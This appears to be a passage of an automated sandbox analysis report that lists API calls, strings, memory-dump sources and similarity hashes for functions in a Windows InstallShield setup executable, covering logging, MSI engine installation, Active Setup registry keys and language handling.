• SysFreeString.OLEAUT32(?), ref: 00403ADC
• SetLastError.KERNEL32(?), ref: 00403B06
• GetLastError.KERNEL32 ref: 00403B21
• SysFreeString.OLEAUT32(?), ref: 00403B35
• SysFreeString.OLEAUT32(?), ref: 00403B42
• SetLastError.KERNEL32(?), ref: 00403B66
  • Part of subcall function 004038A0: GetLastError.KERNEL32(CC858012,?,?,?,?,00471888,000000FF,HsG,004043F6,?,00000001,000000FF), ref: 004038DE
  • Part of subcall function 004038A0: SetLastError.KERNEL32(00477348,00000000,?,00000000), ref: 0040393A
• GetLastError.KERNEL32(?,?,000000FF,00000000,00000001,00000000), ref: 00403BA5
• SysFreeString.OLEAUT32(?), ref: 00403BB9
• SysFreeString.OLEAUT32(?), ref: 00403BC6
• SetLastError.KERNEL32(?), ref: 00403BEA
• GetLastError.KERNEL32 ref: 00403BFD
• SysFreeString.OLEAUT32(?), ref: 00403C11
• SysFreeString.OLEAUT32(?), ref: 00403C1E
• SetLastError.KERNEL32(?), ref: 00403C42
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeString
• String ID: HsG$HsG$HsG
• API String ID: 2425351278-1884270464
• Opcode ID: 065b030965c8c512198ffaff1b0837ef59c33ff7a757d1bddf4dfa190833e556
• Instruction ID: 61f50d9a5d29d22a2ae874efae0c14e9b8f9d4884cce7288c507bc871faf6d54
• Opcode Fuzzy Hash: 065b030965c8c512198ffaff1b0837ef59c33ff7a757d1bddf4dfa190833e556
• Instruction Fuzzy Hash: 139112715083809FE720DF29C949B5BBBE5BF84318F10492DF598972A1D77AE908CF46
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetLastError.KERNEL32 ref: 00401737
• SetLastError.KERNEL32(HsG), ref: 00401775
• GetLastError.KERNEL32(?,00000104), ref: 004017F5
• SetLastError.KERNEL32(HsG), ref: 00401842
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,00000104), ref: 0040187B
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FileModuleName
• String ID: HsG$HsG$InstallShield.log$SOFTWARE\InstallShield\24.0\Professional$VerboseLogPath
• API String ID: 1026760046-381609384
• Opcode ID: f2aa9b82eb1b4ee12e7c254938b02230f88934128d610e703d129273266f9f32
• Instruction ID: ef394eff209162cae146bd54ebdee3494f6fdb9940455087e46632806af88f6d
• Opcode Fuzzy Hash: f2aa9b82eb1b4ee12e7c254938b02230f88934128d610e703d129273266f9f32
• Instruction Fuzzy Hash: 5FA13C71108380DFD720DF65C845B9ABBE4BF94308F00492EF599972A1DBB99548CF5A
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3_GS.LIBCMT ref: 0042847E
• _memset.LIBCMT ref: 004284B1
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
• wsprintfW.USER32 ref: 0042856D
  • Part of subcall function 00436D0C: __EH_prolog3_GS.LIBCMT ref: 00436D13
• wsprintfW.USER32 ref: 004285A4
• wsprintfW.USER32 ref: 004285B7
• _memset.LIBCMT ref: 0042868D
• SetCurrentDirectoryW.KERNEL32(?), ref: 004286C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: wsprintf$ErrorH_prolog3_Last_memset$CurrentDirectory
• String ID: "%s" /c:"msiinst /delayrebootq"$"%s" /q$"%s" /quiet /norestart$/c:"msiinst /delayrebootq"$/quiet /norestart$2.0.2600.0$InstallerLocation$Installing MSI engine %s$Software\Microsoft\Windows\CurrentVersion\Installer$msiaction.cpp
• API String ID: 3028750256-818091861
• Opcode ID: 7283156bc4cea5bf9f6a78ad46acdde11de552acf6c91dc0766c5aa04e962f9f
• Instruction ID: b87da61650dc03525153287c8d68d1589f929bd48d9a8265480beaed98cc750b
• Opcode Fuzzy Hash: 7283156bc4cea5bf9f6a78ad46acdde11de552acf6c91dc0766c5aa04e962f9f
• Instruction Fuzzy Hash: 1451B8B1900228ABDB14DB54DC49BDD73B8AF15305F4041EFA609A7192DF785E84CB5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041E99A
• GetWindowLongW.USER32(?,000000EB), ref: 0041E9C2
• GetDlgItem.USER32 ref: 0041E9DD
• SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0041E9F5
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 0041EA00
• EndDialog.USER32(?,00000001), ref: 0041EA0F
• EndDialog.USER32(?,00000002), ref: 0041EA24
• GetDlgItem.USER32 ref: 0041EA35
• SetWindowLongW.USER32 ref: 0041EA45
• SendMessageW.USER32(?,00000143,00000000,?), ref: 0041EA94
• SendMessageW.USER32(?,00000151,00000000,?), ref: 0041EAAC
• SendMessageW.USER32(?,0000014E), ref: 0041EAD1
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041EB1C
• SetDlgItemTextW.USER32 ref: 0041EB4A
• SetDlgItemTextW.USER32 ref: 0041EB8D
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$Item$DialogLongTextWindow$H_prolog3_
• String ID:
• API String ID: 3382325393-0
• Opcode ID: 70bd93b9d5c8cbad8a66018e73defe87b0944515018ed1f663ab95935f60376f
• Instruction ID: d60a3da391b37610b9fc285d2f382dd35ab929b5ffd2936a3739ea7f905bc18d
• Opcode Fuzzy Hash: 70bd93b9d5c8cbad8a66018e73defe87b0944515018ed1f663ab95935f60376f
• Instruction Fuzzy Hash: 47716F71900218AFDB14DF65CC45BEAB779BB04710F00459AF55AB71D1D7B4AAC0CF68
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memset$lstrcpywsprintf$AllocHeap_free_malloc_memmove
• String ID: %s,%u$%u.%u.%u.%u$\VarFileInfo\Translation
• API String ID: 2339561013-1385173819
• Opcode ID: 44437927b4414b13c61deba6bafb27dceb7df8f9864524895b966f48b1824017
• Instruction ID: e5fa1ed359fb1c2e38ed63969b26add8f0f09f5b617874bbc9721daa69c837fd
• Opcode Fuzzy Hash: 44437927b4414b13c61deba6bafb27dceb7df8f9864524895b966f48b1824017
• Instruction Fuzzy Hash: C25186719002186BD721AB55CC49FAF77BCEF44705F1100DAFA0CE2151D6789E90CFA9
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog3__memset_wcscpy
• String ID: %s%sReason: %s$>>> Fatal %sReason: %s$function failed.$handle in invalid state.$more buffer space required to hold data.$no more items.$passed a bad SQL syntax.$passed an invalid handle.$passed an invalid parameter.$unknown error.
• API String ID: 2196721711-2340172371
• Opcode ID: d25d9e715f0536d24c1fe7b219b55f491049d5f0ef4e7a1936fa54e62313dcac
• Instruction ID: 57c25f43754d667ffcf34d7ea5bfa1266e1883b32a9bdbde624818df8a69f17e
• Opcode Fuzzy Hash: d25d9e715f0536d24c1fe7b219b55f491049d5f0ef4e7a1936fa54e62313dcac
• Instruction Fuzzy Hash: 43313B31614214EAEB21AE74DD89FDA36A8BF40744F78816BB04CE7151DA7DCE40879D
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00424649
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
• GetTempPathW.KERNEL32(00000104,00000000,?,00000104), ref: 004246F4
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
• CoCreateGuid.OLE32(?), ref: 00424710
  • Part of subcall function 0041F5B5: __EH_prolog3.LIBCMT ref: 0041F5BC
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
• CreateDirectoryW.KERNEL32(?,00000000,00000000,?,00000000,?,00000001), ref: 0042477C
  • Part of subcall function 0041F6E0: __EH_prolog3.LIBCMT ref: 0041F6E7
• GetPrivateProfileStringW.KERNEL32 ref: 00424925
• CreateDirectoryW.KERNEL32(?,00000000,?), ref: 00424A16
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$String$CreateH_prolog3H_prolog3_$DirectoryFree$AllocGuidPathPrivateProfileTemp
                                                                                                                                                                          • String ID: !$Could not extract isconfig.ini from current issetup.dll$Extracting resources for '%s' to '%s'$HsG$ISConfig.ini for current issetup.dll does not contain TempPathGuid.$IsConfig.ini$SetupDefaults$TempPathGuid$msiaction.cpp
                                                                                                                                                                          • API String ID: 475049944-3173567293
                                                                                                                                                                          • Opcode ID: c736df42fc1e8133a3aaf12240d668ac6e9cc9ee9e2a311ec99dcacba0d9e779
                                                                                                                                                                          • Instruction ID: 422b42d195b640220aa19e5a20030709430574c772c178844e04b8e6cdc35463
                                                                                                                                                                          • Opcode Fuzzy Hash: c736df42fc1e8133a3aaf12240d668ac6e9cc9ee9e2a311ec99dcacba0d9e779
                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF18F30901158EEDB21DB60CC99BDDBBB4AF15304F5040EEE049B7192DBB85B88DF56
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00424E56
• VariantChangeType.OLEAUT32(?,?,00000000,00000002), ref: 00424EA0
• VariantClear.OLEAUT32(?), ref: 0042506F
Strings
• {78705f0d-e8db-4b2d-8193-982bdda15ecd}, xrefs: 00424EFC
• {1C370964-514B-321C-7237-2B4FD86D8568}, xrefs: 00424FEE
• HsG, xrefs: 0042500E
• Software\Microsoft\Active Setup\Installed Components\%s, xrefs: 0042502D
• {F1B13231-13BE-1231-5401-486BA763DEB6}, xrefs: 00424F4A
• HsG, xrefs: 00424EB9
• {F279058C-50B2-4BE4-60C9-369CACF06821}, xrefs: 00424F06
• {021122EA-49DC-4aeb-9D15-DCEAD9BAB1BC}, xrefs: 00424FE7
• {E7E2C871-090A-C372-F9AE-C3C6A988D260}, xrefs: 00424F7C
• {9B29D757-088E-E8C9-2535-AA319B92C00A}, xrefs: 00424EF2
• {6741C120-01BA-87F9-8734-5FB9DA8A4445}, xrefs: 00424F18
• {7E76A8D6-33D1-0032-16C3-4593092861D0}, xrefs: 00424FB3
Similarity
• API ID: Variant$ChangeClearH_prolog3_Type
• String ID: HsG$HsG$Software\Microsoft\Active Setup\Installed Components\%s${021122EA-49DC-4aeb-9D15-DCEAD9BAB1BC}${1C370964-514B-321C-7237-2B4FD86D8568}${6741C120-01BA-87F9-8734-5FB9DA8A4445}${78705f0d-e8db-4b2d-8193-982bdda15ecd}${7E76A8D6-33D1-0032-16C3-4593092861D0}${9B29D757-088E-E8C9-2535-AA319B92C00A}${E7E2C871-090A-C372-F9AE-C3C6A988D260}${F1B13231-13BE-1231-5401-486BA763DEB6}${F279058C-50B2-4BE4-60C9-369CACF06821}
• API String ID: 1792846764-3449593182
• Opcode ID: e19c57af00a7d685a60a1ac6c43a8072efcd9905f2ec8131e09690753a3a007a
• Instruction ID: e1f09da3d8c79b7a94f4d719e70322d1d5d46633c1e069c4a31a349c26b4b686
• Opcode Fuzzy Hash: e19c57af00a7d685a60a1ac6c43a8072efcd9905f2ec8131e09690753a3a007a
• Instruction Fuzzy Hash: F351B070904228EADB15DBA4DD95BEEB778FB54304F5040ABE105B31C1DBB85F88CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetObjectW.GDI32(00000018,?), ref: 0043D194
• GetDesktopWindow.USER32 ref: 0043D19E
• GetClientRect.USER32 ref: 0043D1A5
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0043D1CC
• GetDC.USER32(?), ref: 0043D1EF
• GetObjectW.GDI32(00000018,?), ref: 0043D206
• CreateCompatibleDC.GDI32(00000000), ref: 0043D20D
• UnrealizeObject.GDI32(?), ref: 0043D22A
• SelectPalette.GDI32(00000000,00000000), ref: 0043D23A
• RealizePalette.GDI32(00000000), ref: 0043D243
• UnrealizeObject.GDI32 ref: 0043D24B
• SelectPalette.GDI32(?,00000000), ref: 0043D259
• RealizePalette.GDI32(?), ref: 0043D25C
• SelectObject.GDI32(00000000), ref: 0043D26A
• BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0043D281
• ReleaseDC.USER32 ref: 0043D28B
• DeleteDC.GDI32(00000000), ref: 0043D292
Similarity
• API ID: Object$Palette$Select$RealizeUnrealizeWindow$ClientCompatibleCreateDeleteDesktopMoveRectRelease
• String ID:
• API String ID: 366568439-0
• Opcode ID: 677b7529f672cd94073a5640aebef2d8f473a285588791bcb5e9a1b8363506d5
• Instruction ID: b2ccb0e58f1a82030835cec0cd54cbeda00348c61cd9d38e7dc0f432015da3d9
• Opcode Fuzzy Hash: 677b7529f672cd94073a5640aebef2d8f473a285588791bcb5e9a1b8363506d5
• Instruction Fuzzy Hash: 1C413771900A09AFDB10EFA5ED88D9FBFBAFB4D310F414025F609A2161CB749984CB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 004363D0
  • Part of subcall function 004357B3: __EH_prolog3_GS.LIBCMT ref: 004357BD
Strings
Similarity
• API ID: H_prolog3_H_prolog3_catch_
• String ID: ($2$HsG$HsG$HsG$HsG$InstalledProductName$PackageCode$Upgrade check: checking product code %s$Upgrade check: later product version already installed$Upgrade check: obtained package code %s from machine, current package code is %s$VersionString$session.cpp
• API String ID: 2112800272-638240998
• Opcode ID: 120769b701112ec8ab18dcc26686db22261c2e5ada71781d1a8c588cdbd3f153
• Instruction ID: 0204d4eceb47be3209c3973f8a897ae08c3e46392e2024efe32576f74c84db10
• Opcode Fuzzy Hash: 120769b701112ec8ab18dcc26686db22261c2e5ada71781d1a8c588cdbd3f153
• Instruction Fuzzy Hash: 9A128E70801248EEDB15DBA4C946BDDB7B4AF15308F1080EEE545BB192DBB85F88CF99
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00437819
  • Part of subcall function 004363C6: __EH_prolog3_catch_GS.LIBCMT ref: 004363D0
• IsValidLocale.KERNEL32(?,00000001,?,00000000,?,?,?,00000000), ref: 004378A2
• _memset.LIBCMT ref: 00437929
• __itow.LIBCMT ref: 00437942
  • Part of subcall function 00444D0D: _xtow@16.LIBCMT ref: 00444D2E
• _wcscat.LIBCMT ref: 00437962
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 0041D880: __EH_prolog3_GS.LIBCMT ref: 0041D88A
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 00433F11: _memset.LIBCMT ref: 00433F6F
  • Part of subcall function 00433F11: _memset.LIBCMT ref: 00433F8A
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3__memset$FreeString$H_prolog3H_prolog3_catch_LocaleValid__itow_wcscat_xtow@16
                                                                                                                                                                          • String ID: $/LangTransform$<MJ$Default language: %d, got code page %d$Language transforms in stream$ScriptDriven$Startup$Using language transforms from setup.exe location$session.cpp
                                                                                                                                                                          • API String ID: 559606162-2858859072
                                                                                                                                                                          • Opcode ID: 6f2b15a9107f50949129f1c71daf3bf9acfbb2ee8ae0d365c4e095d2c0f55bf1
                                                                                                                                                                          • Instruction ID: c09ab663e801afe899ada345f01b923719eec0f64f9772229470391baf9507df
                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2b15a9107f50949129f1c71daf3bf9acfbb2ee8ae0d365c4e095d2c0f55bf1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF16271900119EEDB24EB61CC85BEDB7B8BB04304F1481AEE189A71D1DF789B44DF99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00421068
• _memset.LIBCMT ref: 0042107F
• _memset.LIBCMT ref: 0042109A
  • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 00440164
  • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 0044016C
  • Part of subcall function 00440126: _malloc.LIBCMT ref: 00440186
  • Part of subcall function 00440126: _memset.LIBCMT ref: 00440197
  • Part of subcall function 00440126: _memset.LIBCMT ref: 004401C2
  • Part of subcall function 00440126: wsprintfW.USER32 ref: 00440214
  • Part of subcall function 00440126: _memset.LIBCMT ref: 0044022C
  • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D1D
  • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D27
  • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440D9C
  • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440DC5
  • Part of subcall function 00436D0C: __EH_prolog3_GS.LIBCMT ref: 00436D13
• GetVersionExW.KERNEL32 ref: 0042111D
• _memset.LIBCMT ref: 0042119F
• GetTempPathW.KERNEL32(00000400,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004211B4
• GetWindowsDirectoryW.KERNEL32(?,00000400,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004211DF
  • Part of subcall function 0042159C: _memset.LIBCMT ref: 004215F1
  • Part of subcall function 0042159C: __wsplitpath.LIBCMT ref: 00421601
  • Part of subcall function 0042159C: lstrcatW.KERNEL32(?,00477E70), ref: 00421615
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 0043619F: __EH_prolog3_GS.LIBCMT ref: 004361A9
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memset$ErrorLastlstrcpy$H_prolog3_$FreeString_swscanf$DirectoryPathTempVersionWindows__wsplitpath_malloclstrcatwsprintf
• String ID: HsG$Msi.DLL$Startup$SupportOS$SupportOSMsi12$SupportOSMsi30$SuppressWrongOS
• API String ID: 3706879116-3037316375
• Opcode ID: 416bd0cf505e52742f9f74ea2fa7f5d11c1fe551ba23b47897ad563edc265b8b
• Instruction ID: caa492eded2fdaccb401baaebedf74d337fa1deb203e1fa19a1ead8822504caa
• Opcode Fuzzy Hash: 416bd0cf505e52742f9f74ea2fa7f5d11c1fe551ba23b47897ad563edc265b8b
• Instruction Fuzzy Hash: E581E770A00219AAEB24DB61DC85BEE73B99F15308F5045BFE50AE3191EF389A44CB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00431DC1
• _wcsstr.LIBCMT ref: 00431E50
• CharNextW.USER32(?,?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431E61
• CharNextW.USER32(00000000,?,?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431E66
• CharNextW.USER32(00000000,?,?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431E6B
• CharNextW.USER32(00000000,?,?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431E70
• CharNextW.USER32(00000000,}},?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431F18
• CharNextW.USER32(?,00000000,?), ref: 00431F9D
• CharNextW.USER32(?,00000000,00000001,0000005C,00432177,?,00000000), ref: 00431FB1
• CoTaskMemFree.OLE32(?,0000005C,00432177,?,00000000), ref: 00431FF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CharNext$FreeH_prolog3_Task_wcsstr
• String ID: }}$HKCR$HKCU{Software{Classes
• API String ID: 2086807494-1142484189
• Opcode ID: aeb093225fad7f288d953d11fdf1aac4eec3ddf20d046431c247e71481c2dfe6
• Instruction ID: 3890b2c11137fcd4a6d5b455fef8a38a5d18732a6f98f8215163c9c2b6e0171c
• Opcode Fuzzy Hash: aeb093225fad7f288d953d11fdf1aac4eec3ddf20d046431c247e71481c2dfe6
• Instruction Fuzzy Hash: A871A3709043469AEF14DBF5C985AAEB7B4AF1C304F24542BE805EB3A5EB79CC45CB18
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00439C77
  • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00411344: __EH_prolog3.LIBCMT ref: 0041134B
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0041159A: __EH_prolog3.LIBCMT ref: 004115A1
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
  • Part of subcall function 00411D8B: __EH_prolog3_GS.LIBCMT ref: 00411D95
  • Part of subcall function 00411D8B: SysStringLen.OLEAUT32(?), ref: 00411EBB
  • Part of subcall function 00411D8B: SysFreeString.OLEAUT32(?), ref: 00411ECA
  • Part of subcall function 00411D8B: SysFreeString.OLEAUT32(?), ref: 00411F0F
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$ErrorFreeLast$H_prolog3_$H_prolog3$Alloc
                                                                                                                                                                          • String ID: HsG$HsG$IS_OriginalLauncher:$IS_temp$auto$delayedstart:$extract_all:$installfromweb:$media_path:$no_engine$runfromtemp$tempdisk1folder:
                                                                                                                                                                          • API String ID: 3067009588-2352414546
                                                                                                                                                                          • Opcode ID: 323b9d9b09a83aa8488599d91544a8c6544a86d4cc267c65e5e0bfa600a66efa
                                                                                                                                                                          • Instruction ID: 40a748d07b6352d6f75fad17ff12695912deaa9e15f124b1e0a563052810ffee
                                                                                                                                                                          • Opcode Fuzzy Hash: 323b9d9b09a83aa8488599d91544a8c6544a86d4cc267c65e5e0bfa600a66efa
